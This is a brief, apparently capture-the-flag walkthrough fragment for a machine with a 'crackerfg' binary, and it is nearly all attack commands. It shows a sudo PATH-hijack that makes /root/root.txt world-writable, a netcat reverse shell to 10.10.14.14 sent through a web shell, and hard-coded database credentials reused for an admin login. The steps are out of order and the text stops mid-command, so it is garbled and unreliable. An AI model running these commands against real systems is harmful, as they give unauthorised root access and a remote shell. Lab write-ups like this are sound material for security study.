~upd~ Crackerfg File

echo '#!/bin/bash' > /tmp/hashgen echo 'chmod 777 /root/root.txt' >> /tmp/hashgen chmod +x /tmp/hashgen export PATH=/tmp:$PATH sudo /usr/bin/crackerfg Now /root/root.txt is readable.

You get RCE as www-data . # On attacker machine nc -lvnp 4444 Via the web shell cmd=nc -e /bin/bash 10.10.14.14 4444 crackerfg

$db_user = "webapp"; $db_pass = "crackme_123"; Try admin:crackme_123 on the login page → success. echo '#

Read the flag: